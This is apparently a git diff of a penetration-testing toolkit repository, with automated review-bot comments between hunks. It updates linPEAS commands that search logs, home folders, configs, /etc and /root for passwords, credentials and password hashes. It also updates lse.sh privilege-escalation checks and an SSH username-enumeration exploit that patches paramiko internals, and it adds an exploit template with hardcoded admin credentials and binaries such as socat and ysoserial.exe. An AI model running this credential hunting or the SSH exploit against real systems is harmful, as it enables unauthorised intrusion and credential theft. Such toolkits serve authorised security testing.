+ find /var/log/ -type f -exec grep -RE 'comm="su"|comm="sudo"' '{}' \; 2>/dev/null | sed -${E} "s,\"su\"|\"sudo\",${SED_RED},g" | sed -${E} "s,data=.*,${SED_RED},g"
 echo ""
 ##-- IF) IPs inside logs
- printf $Y"[+] "$GREEN"Finding IPs inside logs (limit 70)\n"$NC
+ print_2title "Finding IPs inside logs (limit 70)"
 (find /var/log/ /private/var/log -type f -exec grep -R -a -E -o "(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)" "{}" \;) 2>/dev/null | grep -v "\.0\.\|:0\|\.0$" | sort | uniq -c | sort -r -n | head -n 70
 echo ""
 ##-- IF) Passwords inside logs
- printf $Y"[+] "$GREEN"Finding passwords inside logs (limit 70)\n"$NC
- (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${C}[1;31m&${C}[0m,"
+ print_2title "Finding passwords inside logs (limit 70)"
+ (find /var/log/ /private/var/log -type f -exec grep -R -i "pwd\|passw" "{}" \;) 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | grep -v "File does not exist:\|script not found or unable to stat:\|\"GET /.*\" 404" | head -n 70 | sed -${E} "s,pwd|passw,${SED_RED},"
 echo ""
 ##-- IF) Emails inside logs
- printf $Y"[+] "$GREEN"Finding emails inside logs (limit 70)\n"$NC
- (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${C}[1;32m&${C}[0m,g"
- echo ""
+ print_2title "Finding emails inside logs (limit 70)"
+ (find /var/log/ /private/var/log -type f -exec grep -I -R -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" "{}" \;) 2>/dev/null | sort | uniq -c | sort -r -n | head -n 70 | sed -${E} "s,$knw_emails,${SED_GREEN},g"
+ echo ""
 ##-- IF) Passwords files in home
- printf $Y"[+] "$GREEN"Finding *password* or *credential* files in home (limit 70)\n"$NC
- (echo "$FIND_HOME $FIND_USR" | grep -E '.*password.*|.*credential.*|creds.*' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${C}[1;31m&${C}[0m," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
+ print_2title "Finding *password* or *credential* files in home (limit 70)"
+ (printf "%s\n" "$PSTORAGE_PASSWORD_FILES" | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 3){ print line_init; } if (cont == "3"){print " #)There are more creds/passwds files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 70 | sed -${E} "s,password|credential,${SED_RED}," | sed "s,There are more creds/passwds files in the previous parent folder,${C}[3m&${C}[0m,") || echo_not_found
 echo ""
 if ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
 ##-- IF) Find possible files with passwords
- printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - only PHP files\n"$NC
+ print_2title "Finding passwords inside key folders (limit 70) - only PHP files"
 intpwdfiles=`timeout 150 grep -RiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" $HOMESEARCH /var/www /usr/local/www/ $backup_folders_row /tmp /etc /root /mnt /Users /private 2>/dev/null`
- printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g"
+ printf "%s\n" "$intpwdfiles" | grep -I ".php:" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
 echo ""
- printf $Y"[+] "$GREEN"Finding passwords inside key folders (limit 70) - no PHP files\n"$NC
- printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${C}[1;31m&${C}[0m,g"
+ print_2title "Finding passwords inside key folders (limit 70) - no PHP files"
+ printf "%s\n" "$intpwdfiles" | grep -vI ".php:" | grep -E "^/" | grep ":" | sed '/^.\{150\}./d' | sort | uniq | grep -iIv "linpeas" | head -n 70 | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[dD][eE][fF][iI][nN][eE],${SED_RED},g"
 echo ""
 ##-- IF) Find possible files with passwords
- printf $Y"[+] "$GREEN"Finding possible password variables inside key folders (limit 140)\n"$NC
- timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g"
- timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables2,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables3,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables4,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables5,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables6,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables7,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables8,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables9,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables10,${C}[1;31m&${C}[0m,g" | sed -${E} "s,$pwd_in_variables11,${C}[1;31m&${C}[0m,g"
+ print_2title "Finding possible password variables inside key folders (limit 140)"
+ timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
+ timeout 150 grep -RiIE "($pwd_in_variables1|$pwd_in_variables2|$pwd_in_variables3|$pwd_in_variables4|$pwd_in_variables5|$pwd_in_variables6|$pwd_in_variables7|$pwd_in_variables8|$pwd_in_variables9|$pwd_in_variables10|$pwd_in_variables11).*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -Ev "^#" | grep -iv "linpeas" | sort | uniq | head -n 70 | sed -${E} "s,$pwd_in_variables1,${SED_RED},g" | sed -${E} "s,$pwd_in_variables2,${SED_RED},g" | sed -${E} "s,$pwd_in_variables3,${SED_RED},g" | sed -${E} "s,$pwd_in_variables4,${SED_RED},g" | sed -${E} "s,$pwd_in_variables5,${SED_RED},g" | sed -${E} "s,$pwd_in_variables6,${SED_RED},g" | sed -${E} "s,$pwd_in_variables7,${SED_RED},g" | sed -${E} "s,$pwd_in_variables8,${SED_RED},g" | sed -${E} "s,$pwd_in_variables9,${SED_RED},g" | sed -${E} "s,$pwd_in_variables10,${SED_RED},g" | sed -${E} "s,$pwd_in_variables11,${SED_RED},g"
 echo ""
 ##-- IF) Find possible conf files with passwords
- printf $Y"[+] "$GREEN"Finding possible password in config files\n"$NC
+ print_2title "Finding possible password in config files"
 ppicf=`find $HOMESEARCH /etc /root /tmp /private /Applications -name "*.conf" -o -name "*.cnf" -o -name "*.config" -name "*.json" 2>/dev/null`
 printf "%s\n" "$ppicf" | while read f; do
 if [ "`grep -EiI 'passwd.*|creden.*' \"$f\" 2>/dev/null`" ]; then
 echo $ITALIC" $f"$NC
- grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${C}[1;31m&${C}[0m,g"
+ grep -EiIo 'passw.*|creden.*' "$f" 2>/dev/null | sed -${E} "s,[pP][aA][sS][sS][wW]|[cC][rR][eE][dD][eE][nN],${SED_RED},g"
 fi
 done
 echo ""
 ##-- IF) Find possible files with usernames
- printf $Y"[+] "$GREEN"Finding 'username' string inside key folders (limit 70)\n"$NC
- timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g"
- timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${C}[1;31m&${C}[0m,g"
+ print_2title "Finding 'username' string inside key folders (limit 70)"
+ timeout 150 grep -RiIE "username.*[=:].+" $HOMESEARCH /Users 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
+ timeout 150 grep -RiIE "username.*[=:].+" /var/www $backup_folders_row /tmp /etc /root /mnt /private 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | grep -v "/linpeas" | sort | uniq | head -n 70 | sed -${E} "s,[uU][sS][eE][rR][nN][aA][mM][eE],${SED_RED},g"
 echo ""
 ##-- IF) Specific hashes inside files
- printf $Y"[+] "$GREEN"Searching specific hashes inside files - less false positives (limit 70)\n"$NC
+ print_2title "Searching specific hashes inside files - less false positives (limit 70)"
 regexblowfish='\$2[abxyz]?\$[0-9]{2}\$[a-zA-Z0-9_/\.]*'
 regexjoomlavbulletin='[0-9a-zA-Z]{32}:[a-zA-Z0-9_]{16,32}'
 regexphpbb3='\$H\$[a-zA-Z0-9_/\.]{31}'
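Review bot: The new `printf "%s\n" "$PSTORAGE_PHP_FILES" | while read c; do grep ... $c ...` line reads each path without `-r` and expands `$c` unquoted, so a path containing spaces or backslashes is word-split or mangled and grep is pointed at the wrong files; `while read -r c; do grep -EiI "..." "$c"` keeps each path intact. The unchanged `ppicf` line in the same hunk has `-name "*.config" -name "*.json"` with no `-o` between the two tests, so they are ANDed and neither `.config` nor `.json` files are ever listed. The enclosing `IntFiles` block starts and ends outside the hunk.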
@@ -3369,24 +3256,24 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
 regexapr1md5='\$apr1\$[a-zA-Z0-9_/\.]{8}\$[a-zA-Z0-9_/\.]{22}'
 regexsha512crypt='\$6\$[a-zA-Z0-9_/\.]{16}\$[a-zA-Z0-9_/\.]{86}'
 regexapachesha='\{SHA\}[0-9a-zA-Z/_=]{10,}'
- timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${C}[1;31m&${C}[0m,"
+ timeout 150 grep -RIEHo "$regexblowfish|$regexjoomlavbulletin|$regexphpbb3|$regexwp|$regexdrupal|$regexlinuxmd5|$regexapr1md5|$regexsha512crypt|$regexapachesha" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | head -n 70 | sed "s,:.*,${SED_RED},"
 echo ""
 fi
 if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
 ##-- IF) Specific hashes inside files
- printf $Y"[+] "$GREEN"Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)\n"$NC
+ print_2title "Searching md5/sha1/sha256/sha512 hashes inside files (limit 50 - only 1 per file)"
 regexmd5='(^|[^a-zA-Z0-9])[a-fA-F0-9]{32}([^a-zA-Z0-9]|$)'
 regexsha1='(^|[^a-zA-Z0-9])[a-fA-F0-9]{40}([^a-zA-Z0-9]|$)'
 regexsha256='(^|[^a-zA-Z0-9])[a-fA-F0-9]{64}([^a-zA-Z0-9]|$)'
 regexsha512='(^|[^a-zA-Z0-9])[a-fA-F0-9]{128}([^a-zA-Z0-9]|$)'
- timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${C}[1;31m&${C}[0m," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m,"
+ timeout 150 grep -RIEHo "$regexmd5|$regexsha1|$regexsha256|$regexsha512" /etc $backup_folders_row /tmp /var/tmp /var/www /root $HOMESEARCH /mnt /Users /private /Applications 2>/dev/null | grep -v "/.git/\|/sources/authors/" | grep -Ev "$notExtensions" | grep -Ev "0{20,}" | awk -F: '{if (pre != $1){ print $0; }; pre=$1}' | awk -F/ '{line_init=$0; if (!cont){ cont=0 }; $NF=""; act=$0; if (cont < 2){ print line_init; } if (cont == "2"){print " #)There are more hashes files in the previous parent folder\n"}; if (act == pre){(cont += 1)} else {cont=0}; pre=act }' | head -n 50 | sed "s,:.*,${SED_RED}," | sed "s,There are more hashes files in the previous parent folder,${C}[3m&${C}[0m,"
 echo ""
 fi
-
+
 if ! [ "$SUPERFAST" ] && ! [ "$FAST" ]; then
 ##-- IF) Find URIs with user:password@hoststrings
- printf $Y"[+] "$GREEN"Finding URIs with user:password@host inside key folders\n"$NC
+ print_2title "Finding URIs with user:password@host inside key folders"
 timeout 150 find /var/www $backup_folders_row /tmp /etc /var/log /private/var/log -type f -exec grep -RiIE "://(.+):(.+)@" "{}" \; 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
 timeout 150 grep -RiIE "://(.+):(.+)@" $HOMESEARCH 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
 timeout 150 grep -RiIE "://(.+):(.+)@" /mnt 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
@@ -3396,4 +3283,4 @@ if [ "`echo $CHECKS | grep IntFiles`" ]; then
 timeout 150 grep -RiIE "://(.+):(.+)@" /Applications 2>/dev/null | sed '/^.\{150\}./d' | grep -v "#" | sort | uniq | sed -${E} "s,:\/\/(.+):(.+)@,://${C}[1;31m\1:\2${C}[0m@,g"
 echo ""
 fi
-fi
+fi
\ No newline at end of file
diff --git a/lse.sh b/lse.sh
index 413717e..04a0cdd 100755
--- a/lse.sh
+++ b/lse.sh
@@ -4,8 +4,8 @@
 # Author: Diego Blanco
 # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
-#
-lse_version="3.2"
+#
+lse_version="3.3"
 #( Colors
 #
@@ -287,7 +287,7 @@ lse_set_level() {
 esac
 }
 lse_help() {
- echo "Use: $0 [options]"
+ echo "Use: $0 [options]"
 echo
 echo " OPTIONS"
 echo " -c Disable color"
@@ -404,7 +404,7 @@ lse_test() {
 cecho "${red}---$reset\n"
 fi
 return 1
- fi
+ fi
 # If level is 2 and lse_level is less than 2, then we do not execute
 # level 2 tests unless their output needs to be assigned to a variable
@@ -534,7 +534,7 @@ lse_exit() {
 }
 lse_procmon() { # monitor processes
- #NOTE: The first number will be the number of occurrences of a process due to
+ #NOTE: The first number will be the number of occurrences of a process due to
 # uniq -c
 while [ -f "$lse_procmon_lock" ]; do
 ps -ewwwo start_time,pid,user:50,args
@@ -564,7 +564,7 @@ lse_proc_print() {
 # A successful test will receive some output while a failed tests will receive
 # an empty string.
 #
-########################################################################( users
+########################################################################( users
 lse_run_tests_users() {
 lse_header "usr" "users"
@@ -582,8 +582,8 @@ lse_run_tests_users() {
 #other users in an administrative group
 lse_test "usr020" "1" \
- "Are there other users in an administrative groups?" \
- 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$" | grep $lse_grep_opts -Ei ":[a-z_-]+\$"'
+ "Are there other users in administrative groups?" \
+ 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$|:$lse_user$" | grep $lse_grep_opts -Ei ":[,a-z_-]+\$"'
 #other users with shell
 lse_test "usr030" "1" \
@@ -591,7 +591,7 @@ lse_run_tests_users() {
 'grep $lse_grep_opts -E ":/[a-z/]+sh\$" /etc/passwd' \
 "" \
 "lse_shell_users"
-
+
 #user env information
 lse_test "usr040" "2" \
 "Environment information" \
@@ -722,7 +722,7 @@ lse_run_tests_filesystem() {
 "Can we write to any setgid binary?" \
 'for b in $lse_setgid_binaries; do [ -x "$b" ] && [ -w "$b" ] && echo "$b" ;done' \
 "fst040"
-
+
 #can we read /root
 lse_test "fst070" "1" \
 "Can we read /root?" \
@@ -863,7 +863,7 @@ lse_run_tests_system() {
 lse_test "sys050" "1" \
 "Can root user log in via SSH?" \
 'grep -E "^[[:space:]]*PermitRootLogin " /etc/ssh/sshd_config | grep -E "(yes|without-password|prohibit-password)"'
-
+
 #list available shells
 lse_test "sys060" "2" \
 "List available shells" \
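Review bot: The new usr020 member filter `grep $lse_grep_opts -Ei ":[,a-z_-]+\$"` still rejects any group whose member list contains a digit or a dot, so a line like `sudo:x:27:ops2` (constructed example) is never reported although such names are valid; `":[,a-z0-9._-]+\$"` covers them. `$lse_user` is also interpolated into the `grep -Ev` regex unescaped, which is harmless for ordinary usernames but deserves a comment, e.g. `# drop the line only when the current user is the sole member`, since `:$lse_user$` does not exclude lines where other members precede it. `lse_run_tests_users` continues outside the hunk.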
@@ -919,7 +919,7 @@ lse_run_tests_security() {
 "Does current user have capabilities?" \
 'printf "$lse_user_caps\n" | grep "$lse_user"' \
 "sec040"
-
+
 #can user read the auditd log
 lse_test "sec060" "0" \
 "Can we read the auditd log?" \
@@ -927,7 +927,7 @@ lse_run_tests_security() {
 }
-##############################################################( recurrent tasks
+##############################################################( recurrent tasks
 lse_run_tests_recurrent_tasks() {
 lse_header "ret" "recurrent tasks"
@@ -960,7 +960,7 @@ lse_run_tests_recurrent_tasks() {
 #can we write to any paths present in cron tasks?
 lse_test "ret050" "1" \
 "Can we write to any paths present in cron jobs" \
- 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | sort -u`; do [ -w "$p" ] && echo "$p"; done' \
+ 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | grep -Ev "/dev/(null|zero|random|urandom)" | sort -u`; do [ -w "$p" ] && echo "$p"; done' \
 "" \
 "lse_user_writable_cron_paths"
@@ -980,7 +980,7 @@ lse_run_tests_recurrent_tasks() {
 #user timers
 lse_test "ret500" "1" \
 "User systemd timers" \
- 'systemctl --user list-timers --all | grep -Ev "(^$|timers listed)"'
+ 'systemctl --user list-timers --all | grep -iq "\.timer" && systemctl --user list-timers --all'
 #can we write in any system timer?
 lse_test "ret510" "0" \
@@ -1026,7 +1026,7 @@ lse_run_tests_network() {
 #nameservers
 lse_test "net530" "2" \
- "Namerservers" \
+ "Nameservers" \
 'grep "nameserver" /etc/resolv.conf'
 #systemd nameservers
@@ -1038,7 +1038,7 @@ lse_run_tests_network() {
 lse_test "net550" "2" \
 "Listening TCP" \
 'netstat -tnlp || ss -tnlp'
-
+
 #listening UDP
 lse_test "net560" "2" \
 "Listening UDP" \
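Review bot: The added `grep -Ev "/dev/(null|zero|random|urandom)"` in ret050 is unanchored and still lets other world-writable pseudo-devices through, so `/dev/tty`, `/dev/stdout` or `/dev/stderr` referenced by a cron job keep showing up as writable paths while a regular path that merely contains that substring is dropped. Anchoring and widening it, `grep -Ev "^/dev/(null|zero|random|urandom|tty|std(in|out|err))$"`, keeps the result to real filesystem paths; a short comment `# pseudo-devices are writable by design and are not cron findings` would explain the filter. `lse_run_tests_recurrent_tasks` continues outside the hunk.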
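Review bot: The new ret500 command runs `systemctl --user list-timers --all` twice, once under `grep -iq "\.timer"` and once for the output, so the printed list is a different snapshot from the one that was tested and the user-bus round-trip is paid twice. Capturing once, `o=$(systemctl --user list-timers --all 2>/dev/null); printf "%s\n" "$o" | grep -iq "\.timer" && printf "%s\n" "$o"`, avoids both, assuming lse_test evaluates the string as shell code the way the `$lse_grep_opts` tests rely on. The surrounding function continues outside the hunk.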
@@ -1187,7 +1187,7 @@ lse_run_tests_software() {
 #check if there are ssh private keys in ssh-agent
 lse_test "sof050" "0" \
 "Are there private keys in ssh-agent?" \
- 'ssh-add -l'
+ 'ssh-add -l | grep -iv "agent has no identities"'
 #check if there are gpg keys in gpg-agent
 lse_test "sof060" "0" \
diff --git a/socat b/socat
new file mode 100644
index 0000000..ddb9097
Binary files /dev/null and b/socat differ
diff --git a/ssh-check-username.py b/ssh-check-username.py
index e246540..95d8676 100755
--- a/ssh-check-username.py
+++ b/ssh-check-username.py
@@ -26,9 +26,7 @@ class InvalidUsername(Exception):
 def add_boolean(*args, **kwargs):
 pass
-
-old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
- paramiko.common.MSG_SERVICE_ACCEPT]
+old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
 def service_accept(*args, **kwargs):
 paramiko.message.Message.add_boolean = add_boolean
@@ -55,14 +53,14 @@ def _paramiko_tunnel(username, *args, **kwargs):
 return
 try:
 transport.auth_publickey(us, paramiko.RSAKey.generate(2048))
- except InvalidUsername:
+ except InvalidUsername or socket.error:
 print ('[*] {} - Invalid username'.format(us))
 except paramiko.ssh_exception.AuthenticationException:
 print ('[+] {} - Valid username'.format(us))
 return
-paramiko.auth_handler.AuthHandler._handler_table.update({
+paramiko.auth_handler.AuthHandler._client_handler_table.update({
 paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
 paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
 })
@@ -81,7 +79,3 @@ if args.wordlist is not None:
 for u in f:
 usernames.append(u)
 pool.map(_paramiko_tunnel, usernames)
-
-
-
-
diff --git a/template.py b/template.py
index ed64fb9..b8c1364 100755
--- a/template.py
+++ b/template.py
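Review bot: `_client_handler_table` is a private paramiko attribute, as `_handler_table` was, so this module-level line ties the script to whichever paramiko releases expose that name and fails at import time with AttributeError on the others, before any code further down the module runs. A comment next to it such as `# paramiko internals: _handler_table became _client_handler_table; keep the pinned version in sync`, plus a version constraint wherever the dependencies are declared (not visible in this diff), would make that coupling explicit.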
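Review bot: `except InvalidUsername or socket.error:` never catches `socket.error`: the `or` is an ordinary expression, `InvalidUsername` is truthy, so the clause reduces to `except InvalidUsername:` and a connection error still propagates out of `_paramiko_tunnel` into the pool worker. Write `except (InvalidUsername, socket.error):`, and confirm `socket` is imported at the top of the file, which is outside this hunk. The function's opening lines are also outside the hunk.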
@@ -16,6 +16,8 @@ from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" +USERNAME = "admin" +PASSWORD = "password" def login(username, password): # Template method to create a session @@ -32,7 +34,7 @@ def exploit(session, payload): pass if __name__ == "__main__": - session = login() + session = login(USERNAME, PASSWORD) exploit(session, "id") """ % baseUrl diff --git a/win/accesschk.exe b/win/accesschk.exe index 74f038b..6fc4abf 100644 Binary files a/win/accesschk.exe and b/win/accesschk.exe differ diff --git a/win/accesschk64.exe b/win/accesschk64.exe index 7683dd9..0c1c01c 100644 Binary files a/win/accesschk64.exe and b/win/accesschk64.exe differ diff --git a/win/winPEAS.bat b/win/winPEAS.bat index da25cd4..9f97875 100644 --- a/win/winPEAS.bat +++ b/win/winPEAS.bat @@ -451,7 +451,7 @@ CALL :T_Progress 1 :UnquotedServicePaths CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" -ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' +ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' ECHO. [i] The permissions are also checked and filtered using icacls ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( 
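Review bot: The added `USERNAME`/`PASSWORD` literals are written into every generated script as plain defaults, and `PASSWORD = "password"` is the kind of line that gets replaced with a real credential and then committed alongside the exploit. Reading them from the environment keeps secrets out of the file, e.g. `PASSWORD = os.environ.get("PASSWORD", "password")` (needs an `import os` in the template header, which is outside this hunk); at minimum a comment such as `# placeholders: set per target, do not commit real credentials` would signal intent. Note that the template body is a `%`-formatted string (`""" % baseUrl` is visible in the second hunk), so any literal `%` in these defaults must be written as `%%`.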
diff --git a/win/ysoserial/NDesk.Options.dll b/win/ysoserial/NDesk.Options.dll
new file mode 100644
index 0000000..df45878
Binary files /dev/null and b/win/ysoserial/NDesk.Options.dll differ
diff --git a/win/ysoserial/ysoserial.exe b/win/ysoserial/ysoserial.exe
new file mode 100644
index 0000000..f45f4f3
Binary files /dev/null and b/win/ysoserial/ysoserial.exe differ
